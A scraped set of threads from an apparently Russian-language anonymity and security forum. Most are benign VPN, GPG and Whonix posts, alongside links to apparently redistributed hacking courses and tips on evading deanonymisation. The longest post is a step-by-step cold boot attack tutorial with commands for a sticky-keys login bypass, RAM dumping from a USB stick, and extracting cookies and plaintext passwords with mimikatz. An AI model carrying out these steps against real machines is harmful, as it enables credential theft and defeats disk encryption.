The Complete Ethical Hacking Course Beginner to Advanced:

️Mega Link - https://mega.nz/folder/TXpXUSbI#5vS2-RUclbt-kqRumNjyXg

Recon for Ethical Hacking Penetration Testing & Bug Bounty:

️Mega Link - https://mega.nz/folder/CDphRCJB#eBZqSmleyW6Thld_8RbZwQ

CAPTCHA, стиль общения итд - малоизвестные, неочевидные способы деанонимизации

ID: 676533bbb4103b69df371900
Thread ID: 127385
Created: 2024-11-21T19:24:55+0000
Last Post: 2024-11-24T20:55:46+0000
Author: nologs73
Replies: 5 Views: 565

1. Капча
Как каптча отделяет людей от ботов? На основе движений мыши пользователя, его скорости разгадывания загадки и так далее. Вся эта информация отправляется на сервера всяких там ReCaptcha и там хранится. В чём же подвох? Ваш метод разгадывания каптч уникален, т.е если вы разгадаете один и тот же вариант каптчи с рабочего ноутбука и с личного - вам пока что не пиздец, пока что такой способ деанона не применялся, но может быть применён в будущем. Решение? Либо не разгадывать каптчи с рабочего ноутбука вообще, либо разгадывать их левой рукой с закрытым правым глазом в неудобной позе, так ваш стиль явно будет отличаться от обычного
2. Стиль написания текста/стиль движения мыши. Это очень мощный вектор атаки, существуют аж отдельные компании, которые на этом специализируются. Ещё [статья](https://blog.securedtouch.com/behavioral- biometrics-101-an-in-depth-look-at-behavioral-biometrics-vs-behavioral- analytics) об этом. Какое решение? Для стиля написания текста - kloak, эта программа добавляет случайные задержки и таким образом обфусцирует твой стиль. Для стиля движения мыши - не знаю, не находил подобных программ
3. Ультразвук
Его используют маркетологи в легитимных целях для кросс девайс трекинга, но ещё его можно использовать для вашего деанона. Как эта будет происходить? Заходите вы с анонимного ноутбука на условный ютуб(или любой другой популярный сайт), начинаете смотреть какой-то ролик, автоматически проигрывается ультразвук на определённой частоте, которая не слышна для человеческого уха, но слышна для микрофона твоего телефона, ваш смартфон этот звук засекает, и всё, вашу виртуальную личность связали с реальной. Эту атаку тоже ещё ни разу не использовали. Решение? Удалите драйвера микрофона и динамика с рабочего ноутбука, а лучше удалите их физически
4. Стилометрия
Ваш стиль текста очень уникален. Ваши грамматические ошибки, уникальные слова, что употребляете только вы, и так далее. Так поймали Теда Казински, думаю, он всем известен. Как решить? LLM, причём ЛОКАЛЬНЫЕ, НЕ ИСПОЛЬЗУЙТЕ ОБЛАЧНЫЕ , просто попросите их перефразировать то, что вы написали, сделать рерайт, скажем так

VeePN - 6 Months VPN service for free

ID: 676533bbb4103b69df371c76
Thread ID: 44969
Created: 2020-11-30T05:34:59+0000
Last Post: 2020-11-30T05:34:59+0000
Author: beserious
Replies: 0 Views: 555

1. Go to https://veepn.com/login/
2. Sign in / Sign Up (sign-in after signup)
3. Goto https://veepn.com/account/setting/
4. In Redeem Code, add COMSS
5. To download, https://veepn.com/account/download/
Enjoy 6 Months VPN

Свой VPN - ShadowSocks. Установка, настройка

ID: 676533bbb4103b69df37199c
Thread ID: 107880
Created: 2024-02-09T19:23:50+0000
Last Post: 2024-03-05T08:31:27+0000
Author: ThorZirael
Prefix: Видео
Replies: 6 Views: 555

Как обойти блокировку VPN - cоздание и установка собственного не блокируемого VPN ShadowSocks, который работает даже в Китае. Легкая установка для каждого.

В комментариях прочел про большой спрос на что-то, что способно обойти блокировки и при этом не быть заблокировано провайдером.

Сначала VPN блокировался провайдерами путем массовых блоков ip адресов VPN сервисов, потом люди стали создавать собственные VPN которые запускали на своих серверах, что стали делать провайдера – блокировать целые протоколы.

Т.е. к примеру вы используете WireGuard, а провайдера научились определять среди интернет трафика то, что вы его используете и просто напросто блокируют использование целого протокола, такого как WireGuard. Понятное дело где-то это WireGuard у одного провайдера, у другого будет Proxy, у третьего OpenVPN, и тд.

На самом деле нет ничего в этом страшного, есть решения которые не будут обнаружены и заблокированы вашим провайдером, V2Ray / XRay / ShadowSocks , есть и другие я назвал только популярные решения, и мы сегодня будет создавать свой ShadowSocks.

Amnezia VPN

Регистрируем свой VPS

VPN не анонимен. Почему нельзя использовать VPN.

Ультимативная анонимность Windows. WireGuard+TOR+OpenVPN

Для Windows - NekoRay / NekoBox
https://github.com/MatsuriDayo/nekoray/releases

Для Iphone / Android - V2Box — клиент V2ray
https://apps.apple.com/us/app/v2box-v2ray-client/id6446814690
https://play.google.com/store/apps/details?id=dev.hexasoftware.v2box&hl=en_US

Raspberry pi, обсуждение

ID: 676533bbb4103b69df3719d3
Thread ID: 88919
Created: 2023-05-25T20:32:29+0000
Last Post: 2023-12-13T23:59:43+0000
Author: Ineversober111
Replies: 5 Views: 552

Приветствую всех! У меня есть вопрос по малинке,а именно как настраивать днс,доступ потерял к акку чтобы у саппа узнать, а вот к роутеру с малинкой нет, то есть вся панель есть, не могу понять как менять днс

Cold boot attack. Дампим оперативную память с помощью флешки

ID: 676533bbb4103b69df371a73
Thread ID: 85496
Created: 2023-04-08T18:20:53+0000
Last Post: 2023-04-09T12:25:06+0000
Author: baykal
Prefix: Статья
Replies: 1 Views: 551

Даже если ты заботишься о сохранности своих данных, не клеишь листочки с паролями на монитор, шифруешь жесткий диск и всегда блокируешь комп, прежде чем отлучиться в туалет, это совершенно не означает, что твоя информация в безопасности. Содержимое памяти можно легко сдампить с помощью обычной флешки, и сейчас я подробно расскажу, как это сделать.

Этой статьей мы начинаем серию публикаций о практических приемах взлома и атак с использованием подручных устройств, которые можно собрать дома. Мы раскроем простые способы получения несанкционированного доступа к защищенной информации и покажем, как ее оградить от подобных атак.

Представь, что ты вышел поговорить по телефону, перекусить либо просто погулять и оставил свой компьютер или ноутбук без присмотра на 10–15 минут. Возможно, ты сотрудник офиса или студент вуза и у тебя перерыв. При этом ты, как правильный пользователь, заблокировал свой компьютер. У тебя даже зашифрованный HDD или SSD, стойкий пароль на вход в систему, установлены все необходимые обновления. Кажется, что все отлично и твои данные в безопасности. Но так ли это на самом деле?

Давай подумаем. Представим себя в роли потенциального злоумышленника. Первое и самое простое, что мы можем сделать, когда время ограниченно, — это присоединиться к компьютеру напрямую с помощью витой пары. Ведь для этого не нужно даже входить в систему. Так мы получим сетевой канал взаимодействия, который, возможно, позволит взломать компьютер одним из следующих способов:

уязвимости (MS17-010, BlueKeep, PrintNightmare);

NetBIOS/LLMNR spoofing (Responder);

bruteforce (SMB, RDP);

MITM (Evilgrade, BDFProxy, MS16-101).

Каждый из перечисленных способов заслуживает отдельного описания, но это не наш случай. Мы считаем, что система достаточно «свежая» и имеет все необходимые обновления, а пароль на вход более‑менее стойкий.

Второе, что мы можем, — перевести машину в спящий режим или гибернацию. Даже в спящем режиме диск не используется, подпитывается только RAM. После этого можно извлечь жесткий диск и подключиться к нему напрямую, например с помощью девайса, изображенного на следующем рисунке.

USB-адаптер для прямого доступа к диску
В большинстве случаев этого окажется достаточно. Если бы перед нами был обычный незашифрованный HDD или SSD, мы смогли бы получить доступ ко всем документам и файлам, включая системные, извлечь пароли и так далее. С подобным прямым доступом к диску мы не будем довольствоваться только пассивным чтением информации, а получим возможность изменять данные на нем. Теоретически мы можем сбросить пароль и, вернув диск обратно в комп, успешно войти в пользовательскую сессию через пятикратное нажатие клавиши Shift:

Code:Copy to clipboard

mount /dev/sdb2 /media/hdd cp /media/hdd/Windows/System32/cmd.exe /media/hdd/Windows/System32/sethc.exe

Мы не станем развивать данный сценарий, поскольку реализовать его довольно просто, хотя в нем есть свои тонкости. И все‑таки наша цель — это компьютер с зашифрованным диском.

Наконец, третье, что мы можем сделать, — атака холодной перезагрузкой (cold boot attack), которой и посвящена сегодняшняя статья.

Cold boot attack — это широко известный способ получения доступа к RAM, использующий эффект сохранения данных в памяти, который достигается так называемой холодной перезагрузкой — перезагрузкой без использования ПО, или, грубо говоря, аппаратной перезагрузкой.

Почему не программной? При программной перезагрузке закроются все процессы и файлы, смаппленные в RAM, и, возможно, она даже будет принудительно затерта. Вот почему нам так важно сделать перезагрузку самостоятельно, без привлечения операционной системы, сохранив все ценные данные в памяти.

Добиться такой перезагрузки можно, например, следующими способами:

аппаратно отключить‑включить питание (очень быстро);

выполнить аппаратный reset;

вызвать Blue Screen of Death (BSOD).

При использовании каждого из перечисленных способов ОС не успеет или не сможет затереть данные в RAM перед перезагрузкой. Если вставить загрузочную флешку, то управление может перейти уже на нее, и можно будет исполнить загрузочный код, который и считает ту самую незатертую память.

На ноутбуке мы получаем дополнительные проблемы. Во‑первых, только у малой части ноутбуков сейчас есть отдельная кнопка аппаратной перезагрузки. Во‑вторых, современные ноутбуки часто не снабжаются съемными аккумуляторами, так что вынуть аккумулятор на короткое время вряд ли получится. В таком случае можно попробовать вызвать перезагрузку, вставив флешку со специально поврежденной файловой системой, которая искусственно вызовет BSOD.

Скачать и записать на флешку такой образ можно, например, так (подразумевается, что у тебя Linux и установлен Git):

Code:Copy to clipboard

git clone https://github.com/mtivadar/windows10_ntfs_crash_dos dd if=tinyntfs of=/dev/sdb

Как поступить, каждый раз приходится решать отдельно, но нужно помнить, что ошибка недопустима, ведь можно потерять данные в RAM. Хотя современная Windows, которая так любит уходить в спящий режим, может нам помочь и вернуть состояние RAM из файла гибернации.

В крайнем случае есть еще вариант: извлечь и охладить планки памяти DRAM/SRAM и перенести их на другую плату, но он технически намного сложнее и реализуется не так быстро, поскольку требует разбирать компьютер, поэтому его мы не рассматриваем. Другое дело — загрузочная флешка: открытый порт USB есть почти везде.

Все необходимые примитивы — это чтение физической памяти и прямая запись на жесткий диск, которые можно взять из следующего кода:

Code:Copy to clipboard

[org 0x7C00] [bits 16] resetdisk: mov ah, 0x00 ; reset function mov dl, 0x00 ; drive int 0x13 ; disk int jc resetdisk getmem: mov bx, 0x0000 ; segment mov es, bx mov bx, 0x8000 ; offset ; es:bx = 0x0000:8000 writedisk: mov ah, 0x03 ; write function mov al, 0x01 ; sectors mov ch, 0x00 ; cylinder mov cl, 0x03 ; sector mov dh, 0x00 ; head mov dl, 0x80 ; drive int 0x13 ; disk int times 510 - ($ - $$) db 0x00 db 0x55, 0xAA times 8096 db 0xfe

Если скомпилировать и поместить этот код в самое начало любой флешки или диска, то BIOS выполнит его как загрузочный:

Code:Copy to clipboard

nasm bootcode.asm qemu-system-i386 -hda bootcode

У компьютера с классическим BIOS загрузочный код выполняется в реальном режиме (16 бит) и доступ к памяти идет по физическому адресу. Адрес читаемой RAM указывается в паре регистров ES:BX. Доступ на запись к жесткому диску или флешке осуществляется при помощи BIOS-прерывания 0x13 (по сути, это что‑то вроде API для BIOS). И в результате выполнения такого кода содержимое 512 байт RAM будет скопировано на сектор HDD. Завернув этот участок кода в цикл, мы, в принципе, можем считать всю RAM целиком.

Не пугайся, никакой код на ассемблере мы больше писать не будем. Уже есть удобный инструмент, который создан специально для этой атаки. И, как ты, возможно, догадался, эксплуатировать cold boot attack мы будем с помощью простой загрузочной флешки.

ПОДГОТОВКА

Подготовим атакующую загрузочную USB-флешку, которая будет дампить RAM в неразмеченную область. Так файловая система (ФС) флешки не пострадает:

Code:Copy to clipboard

wget https://github.com/baselsayeh/coldboot-tools/releases/download/2/bios_memimage64.zip

Code:Copy to clipboard

sudo dd if=grldr.mbr of=/dev/sdb conv=notrunc # Установка загрузчика GRUB4DOS в MBR

Code:Copy to clipboard

sudo fdisk /dev/sdb # Создаем один раздел, не до конца области диска, оставив 4–8 Гбайт

Code:Copy to clipboard

sudo mkfs.fat /dev/sdb1 # Используем самую простую ФС

Code:Copy to clipboard

sudo mount /dev/sdb1 /media/usb

Code:Copy to clipboard

cp grldr menu_sec_part.lst scraper*.bin /media/usb/ # Установка dump RAM

Содержимое конфигурационного файла загрузчика menu_sec_part.lst :

Code:Copy to clipboard

title Dump the ram (64bit Halt) map (hd0) (hd1) map (hd0,1)+1 (hd0) # Раздел флешки, на который будет сохранен дамп RAM map --hook rootnoverify (hd0,0) chainloader --force --boot-cs=0x7c0 --boot-ip=0x200 (hd1,0)/boot/grub4dos/scraper/scraper64_haltonly.bin # Используем длинный режим, чтобы скопировать больше 4 Гбайт RAM

Эта конфигурация предусматривает, что содержимое RAM будет сохраняться непосредственно в дополнительный раздел на флешке, минуя файловую систему. На самом деле с помощью загрузчика GRUB мы можем создать виртуальный диск из файла. Это дало бы нам в дальнейшем удобный доступ к дампу в виде файла на флешке. Несомненно, это было бы более правильно, но на современных файловых системах не так просто создать нефрагментированный сплошной файл большого размера. На FAT32 файл больше 4 Гбайт вообще не создать, а, например, на NTFS ровно посередине раздела будет расположен служебный MFT, описывающий файлы, и при записи на такой виртуальный диск ты попросту затрешь свою ФС. Так что рекомендую классический вариант с дампом RAM в раздел, а не в файл.

ЭКСПЛУАТАЦИЯ

Совсем необязательно, чтобы на целевом компе была включена автоматическая загрузка с USB-флешки. Многие версии BIOS поддерживают выбор носителя для загрузки через нажатие клавиши F8 (или аналогичной). Но даже если нет, это по‑прежнему можно сделать через вход в BIOS и изменение настроек в нем.

Сама атака занимает некоторое время и выглядит как простое подключение USB- флешки. И пока пользователь отсутствует, данные из его RAM постепенно утекают на съемный носитель злоумышленника. Демонстрация этой атаки представлена на следующем рисунке.

![](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F7c422f193cae54941aafd12a17ef17e4%2F29407%2Fcold- boot3.jpg&hash=5adf7f8f5019028fcb959654a9ca0e08)
Дамп RAM на флешку в действии

Как только атака будет завершена, точная копия оперативной памяти сохранится во втором разделе нашей флешки (/dev/sdb2). Преобразуем ее в привычный файл для удобства:

Code:Copy to clipboard

sudo dd if=/dev/sdb2 of=ram.img bs=512 status=progress

У меня получившийся дамп был немного сдвинут — на 0x53000 байт, но это легко исправить:

Code:Copy to clipboard

truncate -s $[0x53000] pad.img cat pad.img ram.img > _ram.img

Теперь перед нами та самая оперативная память, что была на момент аппаратного сброса, со всеми лежащими в ней секретами, которые можно легко обнаружить:

Code:Copy to clipboard

radare2 -n ram.img /wi cookie: # Ищем все cookie /wi passw # Ищем пароли

Используя сигнатурный подход, то есть зная определенные ключевые слова, такие как Password, Secret или Cookie, мы можем простым поиском по содержимому найти те или иные чувствительные данные. Например, по сигнатурам, которые есть у большинства файлов, можно искать RSA-ключи, возможно — какие‑то фотографии, PDF-документы, архивы и прочее.

На следующем рисунке представлен пример того, что было запущено в системе перед блокировкой компьютера и началом атаки.

![](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F7c422f193cae54941aafd12a17ef17e4%2F29406%2Fcold- boot2.jpg&hash=636c34be0bab47a0813ac19d379e9258)
Состояние ПК перед блокировкой и аппаратным сбросом
А после — на машине атакующего в памяти содержится введенная строка.

![](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F7c422f193cae54941aafd12a17ef17e4%2F29408%2Fcold- boot4.png&hash=2b92e87485e294a18b6e8c6bd52edd33)
Расположение текста с экрана в RAM

Но извлекать данные из RAM по сигнатурам — это далеко не все, что мы можем. В дампе памяти присутствуют еще те самые структуры ОС, которые позволят восстановить хронологию событий в системе перед аппаратным сбросом.

Внимательный читатель заметит, что для реализации такой атаки требуется запустить на целевом компьютере код загрузочной флешки, а это перезапишет некоторые области в памяти. Экспериментально, с помощью побайтового сравнения содержимого RAM виртуальных машин на соответствующих этапах, было выявлено, что разнообразные загрузчики затирают собой не так уж и много памяти.

Вот количество перезаписываемых байтов в RAM на разных этапах загрузки:

bootmgr (загрузчик Windows 7, 10) — 5 157 389 байт;

GRUB 2 (загрузчик Linux) — 8 219 883 байт;

burg (альтернативный загрузчик Linux) — 9 599 333 байт;

liveOS для форензики — 171 944 965 байт.

Загрузочный код из Coldboot-Tools для дампа памяти на диск расходует порядка 95 Кбайт памяти. Суммарно вся цепочка GRUB4DOS + scraper64_haltonly.bin перезапишет 820 Кбайт оперативной памяти. В то время как полный объем RAM современных компьютеров измеряется десятками гигабайт.

Тем не менее перезапись даже нескольких мегабайт в неудачном месте может нарушить важные структуры и сделать невозможным восстановление картины состояния ОС. Опытным путем на примере Windows 7 было установлено, что в первых 100 Мбайт RAM содержится не так много данных и только перезапись области 5–15 Мбайт и 105–110 Мбайт разрушает важные структуры данных, нужные для анализа состояния ОС.

На практике же выполняемый дамп памяти посредством GRUB4DOS + scraper64_haltonly.bin все же окажется пригоден для анализа. Все изменения в RAM будут происходить в самом начале, тогда как сама ОС будет размещена после первых 100 Мбайт, что практически исключит вероятность перезаписи. Энтропия дампа показывает общую картину расположения в ней данных и пустот.

![](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F7c422f193cae54941aafd12a17ef17e4%2F29405%2Fcold- boot.png&hash=ec2cc40c7ae97b1ecd5d1260dac90f90)
Энтропия 1 Гбайт RAM, содержащей загруженную Windows
Таким образом, мы расширим простой сигнатурный подход к извлечению секретов из дампа памяти до продвинутого с использованием форензики, который сможет нам многое рассказать о жертве нашей атаки.

ИЗВЛЕКАЕМ СЕКРЕТЫ

И здесь мы плавно переходим к форензике. Используя известные инструменты, такие как Volatility или Rekall, мы можем получить большой объем данных о состоянии ОС на момент нашего вмешательства. Список процессов — это отличная демонстрация того, что мы на верном пути.

![](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F7c422f193cae54941aafd12a17ef17e4%2F29409%2Fcold- boot5.png&hash=28ddc2bedf4a013fe38e13488fe71aeb)
Список процессов в момент аппаратного сброса
Например, мы можем найти расположение файлов реестра в RAM и извлечь оттуда хеши паролей локальных учетных записей.

![](/proxy.php?image=https%3A%2F%2Fstatic.xakep.ru%2Fimages%2F7c422f193cae54941aafd12a17ef17e4%2F29410%2Fcold- boot6.png&hash=cb2b8b57827e08b410458b41e9325836)
Извлекаем локальные учетные записи

Подобное можно сделать и для доменных учеток, получая пароли уже открытым текстом:

Code:Copy to clipboard

vol.py --plugins=/path/to/volatility_plugins/FrancescoPicasso -f ram.img mimikatz

Далее следует список открытых файлов и их содержимое, сетевые соединения, буфер обмена и даже снимок рабочего стола:

Code:Copy to clipboard

vol.py -f ram.img filescan vol.py -f ram.img dumpfiles -r '.sqlite' -D files/ vol.py -f ram.img netscan vol.py -f ram.img clipboard vol.py -f ram.img screenshot -D .

И так далее... Словом, все как при обычной форензике.

EFI

У этой атаки есть маленькая особенность — она работает главным образом на компьютерах с классическим BIOS.

На EFI разных производителей опытным путем было установлено, что сразу после перезагрузки при начальной инициализации оборудования случайные байты записываются во всю оперативную память, и это полностью защищает пользователей современных ПК с EFI от покушений со стороны злоумышленников.

Проверить это легко с помощью того же загрузчика GRUB4DOS. Он поддерживает чтение/запись произвольных участков RAM посредством специальных команд. Находим любой адрес в памяти для теста, смотрим его содержимое и запоминаем:

Code:Copy to clipboard

map --rd-base=0xADDR map --rd-size=0x200 cat --hex (rd)0x0+1

Перезаписываем, например словом test, и делаем перезагрузку:

Code:Copy to clipboard

write (rd)0x0+1 test reboot

Загрузчик GRUB4DOS при перезагрузке не затирает память, так что этот способ идентичен холодной перезагрузке.

Далее проверяем, затер ли EFI нашу память, или же после перезагрузки наши данные в RAM остались нетронутыми. В моем случае память изменилась. Проверялось это на ноутбуках фирм HP и Lenovo. Тем не менее инструмент memory scrapper доступен и для EFI.

ВЫВОДЫ

Мы увидели, что в RAM все данные открыты и описанная выше атака позволяет обойти полное шифрование диска, да еще и на заблокированном компе! Иными словами, мы смогли атаковать реально защищенный компьютер, который считается эталоном безопасности для стандартных рабочих мест большинства компаний, не говоря уже о простых домашних машинах.

Несмотря на то что компьютеры с классическим BIOS постепенно уходят в прошлое, в корпоративном сегменте, где массовая замена техники стоит больших денег, по‑прежнему можно встретить немало старых системников, за которыми продолжают работать сотрудники. Кроме того, современные материнские платы с EFI всё еще поддерживают старый legacy-режим BIOS, что делает их также уязвимыми к этой атаке.

Автор @s0i37

wireguard+TOR безопасна ли связка

ID: 676533bbb4103b69df371aa2
Thread ID: 74681
Created: 2022-10-24T22:32:01+0000
Last Post: 2022-10-30T08:08:30+0000
Author: SamanthaGrey
Replies: 12 Views: 548

wireguard+TOR безопасна ли связка?
сейчас юзаю doublevpn+tor, скорость макс 1Мб./сек без TORа, с TORом 100-300 Кб./сек, надоели постоянные отвалы...
Посоветуйте,плиз, связку с хорошей скоростью и безопасностью!

RDP или IKVM?

ID: 676533bbb4103b69df371921
Thread ID: 124131
Created: 2024-10-05T01:49:19+0000
Last Post: 2024-10-05T11:52:04+0000
Author: xatab
Replies: 1 Views: 546

Условно, если я подключаюсь через tor и моя exit node скомпромитирована и траффик слушают, при каком типе подключения у злоумышленника больше шансов расшифровать происходящие на мониторе или нажатие клавиш?

(GPG) Подписываем сообщения и проверяем их подлинность

ID: 676533bbb4103b69df371ade
Thread ID: 71336
Created: 2022-08-08T20:25:25+0000
Last Post: 2022-08-10T07:58:32+0000
Author: peacemaker
Prefix: Мануал/Книга
Replies: 0 Views: 546

Наверное все видели подписанные сообщения, но ни кому в голову не приходило, а как их проверить? Вдруг это мошенники

Как подписать сообщение?

Создаем файл с сообщением который хотим подписать
nano text.txt

Привет, мы это сообщение подпишем

Click to expand...

Подписываем
gpg --sign --clearsign test.txt
И на выходе получаем файл text.txt.asc

Содержимое можете отправить вашему собеседнику или куда угодно.

Проверяем сообщение

Для начала нам нужно импортировать публичный ключ собеседника. Он или у вас уже импортирован, если вы уже общались с человеком с помощью gpg.
Или можете импортировать
gpg --import file_key.asc

Можете взять мой для примера

[ http://snw2i6zk7htxx7dtejpc7mq7omk7zxkpoczi3k6af3rmpmuxfvig2rid.onion/peacemaker/vector- docs ](http://snw2i6zk7htxx7dtejpc7mq7omk7zxkpoczi3k6af3rmpmuxfvig2rid.onion/peacemaker/vector- docs)

А дальше создаем файл
nano text.txt

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Привет
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEbT9SP5IMfTfkU2cfGFvPqbxDAw0FAmLxbM8ACgkQGFvPqbxD
Aw2ySxAAt3ojv1d59rhwFx27Hsk15/+MP7o9loj0qABZBAFIr/CIAF0CIXy+oVcf
76NWqg8vs3kFB5jDqwmWKGHMwtfpR9q8KOv9GQI/KtP2chkkYIPuhXsUUSjilfit
OqWGF68vacoN4dyZUOjcGa32TC1PZwMBI1GdQeK9iiTzy4e0YuVtIWZVQuvCTVyt
5cmJQ8osdUCB3ht90t/jlVQPoNNCDjby59IyZCojbO//wMiNX52mRjj0E30wE7YD
/jZhHKZ7QD6G4hObNY4cYhIn8AK2zgGTpSzYTPOqvbwDNrp/83C06or3QHNWfkkE
n2KKD1E0HaOBOrwM7f2RDR0FGwGAsak6+f8/gHklD8ZbV3boGPEaaHtvEhdqNRTa
PGcDkCC1olb8/RLV7RvYuI7XrVpXCoWn9l6veMKZ4NQlAUyoNvkCWtyl9Dp4QubJ
uxbKnyQmMZo6WVgmenb0myExtJ+cj15MfdVnEQXh/3t4+M7uZWxPN7UtLjJ+Pj68
3UI1jNbFRoEDsPkuw8ruTnQ+aIWJ5B86Q7dIexhetbAN8UdrPwej2nveUrbCVif/
+6inBpg9r0ZmiLUjnMIlK64l1b71yiMuOsPHcCnuC4xtgqWNqWpCBteC8Wluqbor
4Uh2/pzg60eJ2UEXlc9EkQqkdqDWYtkVE8E2m9SMHl2mBiz4OYM=
=DFzY
-----END PGP SIGNATURE-----

Click to expand...

Сохраняем и выполняем команду
gpg --verify text.txt

Смотрим в выводе, действительно ли это мое сообщение или нет Теперь вы знаете как подписать сообщение или проверить его достоверность. Будьте всегда на чеку

Learn Computer Forensics - Second Edition (2022)

ID: 676533bbb4103b69df371ae3
Thread ID: 71220
Created: 2022-08-06T06:38:18+0000
Last Post: 2022-08-06T12:37:46+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 1 Views: 545

Computer Forensics, being a broad topic, involves a variety of skills which will involve seizing electronic evidence, acquiring data from electronic evidence, data analysis, and finally developing a forensic report.
This book will help you to build up the skills you need to work in a highly technical environment. This book's ideal goal is to get you up and running with forensics tools and techniques to successfully investigate crime and corporate misconduct. You will discover ways to collect personal information about an individual from online sources. You will also learn how criminal investigations are performed online while preserving data such as e-mails, images, and videos that may be important to a case. You will further explore networking and understand Network Topologies, IP Addressing, and Network Devices. Finally, you will how to write a proper forensic report, the most exciting portion of the forensic exam process. By the end of this book, you will have developed a clear understanding of how to acquire, analyze, and present digital evidence, like a proficient computer forensics investigator.

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Компьютерная криминалистика, будучи широкой темой, включает в себя целый ряд навыков, в том числе изъятие электронных улик, получение данных из электронных улик, анализ данных и, наконец, составление отчета о судебной экспертизе. Эта книга поможет вам приобрести навыки, необходимые для работы в высокотехничной среде. Идеальная цель этой книги - помочь вам освоить инструменты и методы судебной экспертизы для успешного расследования преступлений и корпоративных правонарушений. Вы узнаете о способах сбора личной информации о человеке из онлайн-источников. Вы также узнаете, как проводятся уголовные расследования в Интернете, сохраняя такие данные, как электронная почта, изображения и видео, которые могут быть важны для дела. Далее вы изучите сетевые технологии и поймете, что такое топология сети, IP-адресация и сетевые устройства. Наконец, вы узнаете, как правильно написать отчет о судебной экспертизе - самую захватывающую часть процесса судебной экспертизы. К концу этой книги вы будете иметь четкое представление о том, как получать, анализировать и представлять цифровые доказательства, как опытный следователь в области компьютерной криминалистики.

[ Learn Computer Forensics.pdf

](https://cloud.mail.ru/public/Z6fg/J3sNK7DLU)

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail

cloud.mail.ru

Bitwarden Send - способ надёжного обмена информацией

ID: 676533bbb4103b69df371c20
Thread ID: 49292
Created: 2021-03-13T15:08:59+0000
Last Post: 2021-03-13T15:08:59+0000
Author: MaFio
Replies: 0 Views: 545

Bitwarden*, разработчик одноименного менеджера пароля со сквозным

шифрованием, сделал решение, позволяющее быстро передавать зашифрованную информацию другому человеку.

Как это устроено

- информация зашифрована сквозным шифрованием для надежной защиты.
- можно передавать информацию в виде текста и файлов**.
- можно установить время удаления, чтобы ваша информация не осталась замеченной в дальнейшем.
- добавьте пароль для дополнительной защиты.
- используйте отправку из любого клиента Bitwarden.

Hidden content for authorized users.

![bitwarden.com](/proxy.php?image=https%3A%2F%2Fbitwarden.com%2Fimages%2Fsocial- banner.png&hash=65b45757491a1a697bb78688659eb0b1&return_error=1)

Bitwarden Send

A trusted way to securely share information directly with anyone

bitwarden.com

* Понравится пользователям Bitwarden
** В бесплатной версии позволяет отправлять текст, премиум 12$ позволяет отправлять файлы.

Дистрибутивы Линукс, обсуждение

ID: 676533bbb4103b69df3719a8
Thread ID: 107632
Created: 2024-02-06T15:30:04+0000
Last Post: 2024-02-13T10:23:28+0000
Author: dxcpw
Replies: 9 Views: 543

Друзья, какой дистрибутив используйте вы для анонимной работы и какие дистрибутивы вы крайне не советуйте для работы?

Буду рад вашим ответам.

Какую информацию хранит (Дата-центр)?

ID: 676533bbb4103b69df3719b6
Thread ID: 61933
Created: 2022-01-24T19:34:28+0000
Last Post: 2024-01-31T16:28:17+0000
Author: serverspace
Replies: 5 Views: 543

DELETED

Анонимность, безопасность, RDP, VNC (запуск RDP через ProxyChains. TOR. Linux)

ID: 676533bbb4103b69df3719fa
Thread ID: 99823
Created: 2023-10-11T01:16:28+0000
Last Post: 2023-10-15T14:53:34+0000
Author: ded9aw23
Replies: 11 Views: 543

Запуск RDP через ProxyChains. TOR. Linux

Здравствуйте.
Подскажите, пожалуйста, как запусить RDP через ТОР ProxyChains, Linux и учеcть при этом утечку DNS?

Анонимность и безопасность при пентесте сетей. Схемы. Рекомендации.

ID: 676533bbb4103b69df371b3a
Thread ID: 63776
Created: 2022-03-03T17:52:10+0000
Last Post: 2022-03-04T06:28:34+0000
Author: студент Шурик
Replies: 4 Views: 536

всех приветствую. очень много на форуме статей и схем про анонимность и безопасность но нет ничего конкретного под эту тему. авторы статей рекомендуют свои наилучшие схемы но потом как оказывается не советуют их для пентеста сетей в реальных условиях. для этого и была создана специально эта тема чтобы не лопатить форум а всё собрать в одном месте. просьба постить реальные работающие схемы. спасибо за понимание.

к тому же мне как начинающему надо создать рабочую среду и с чего-то начать, поэтому прошу помощи в этом вопросе всех кто в этом может способствовать.

Ошибка при запуске Whonix

ID: 676533bbb4103b69df371af9
Thread ID: 63324
Created: 2022-02-22T07:58:21+0000
Last Post: 2022-06-26T17:11:54+0000
Author: T3atral
Replies: 15 Views: 536

Установил Whonix. Запускаю и пишет это:
Не удалось открыть сессию для виртуальной машины Whonix-Workstation-XFCE.

The native API dll was not found (C:\Windows\system32\WinHvPlatform.dll) (VERR_NEM_NOT_AVAILABLE).

VT-x is disabled in the BIOS for all CPU modes (VERR_VMX_MSR_ALL_VMX_DISABLED).

Код ошибки: E_FAIL (0x80004005)
Компонент: ConsoleWrap
Интерфейс: IConsole {872da645-4a9b-1727-bee2-5585105b9eed}

Что это ожет быть?
Два раза переустанавливаал

Собственный VPN за 3 команды. Легкая установка VPN WireGuard

ID: 676533bbb4103b69df3719a1
Thread ID: 107448
Created: 2024-02-04T11:44:59+0000
Last Post: 2024-02-20T08:46:43+0000
Author: ThorZirael
Replies: 4 Views: 535

Собственный VPN за 3 команды. Легкая установка VPN WireGuard

Тайм коды:

Регистрация VPS сервера: 02:17

Установка и настройка VPN WireGuard на сервер: 04:33

Зачем нужен VPN:

Для обхода блокировок местного провайдера и ограничений страны.

Для невозможности отслеживания ваших действий местным провайдером. Т.е. провайдер предоставляя Вам интернет видит какие ip адреса вы посещаете, имеет возможность просматривать Ваши ДНС запросы.

Почему собственный VPN сервер, а не покупка подписки на VPN?

